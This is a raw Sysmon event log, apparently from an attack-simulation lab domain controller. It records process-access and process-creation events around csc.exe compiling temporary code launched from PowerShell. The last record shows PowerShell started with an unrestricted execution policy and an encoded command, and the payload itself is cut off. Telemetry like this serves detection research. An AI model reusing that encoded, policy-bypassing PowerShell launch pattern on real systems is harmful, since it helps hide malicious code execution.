12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6441-6064-DC02-00000000AD01}2016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-6441-6064-DB02-00000000AD01}41324208C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{266CAFBE-6441-6064-DC02-00000000AD01}2016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.209{266CAFBE-6441-6064-DC02-00000000AD01}2016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESD28A.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCB304B5D2C80A486A9F374553E2D2FFEC.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{266CAFBE-6441-6064-DB02-00000000AD01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\sdvgceyb.cmdline" 10341000x8000000000000000594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6441-6064-DB02-00000000AD01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6441-6064-DB02-00000000AD01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-6440-6064-D902-00000000AD01}37122676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6441-6064-DB02-00000000AD01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d8ed2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d894a|UNKNOWN(00007FF893A7BB0F) 154100x8000000000000000582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.113{266CAFBE-6441-6064-DB02-00000000AD01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\sdvgceyb.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 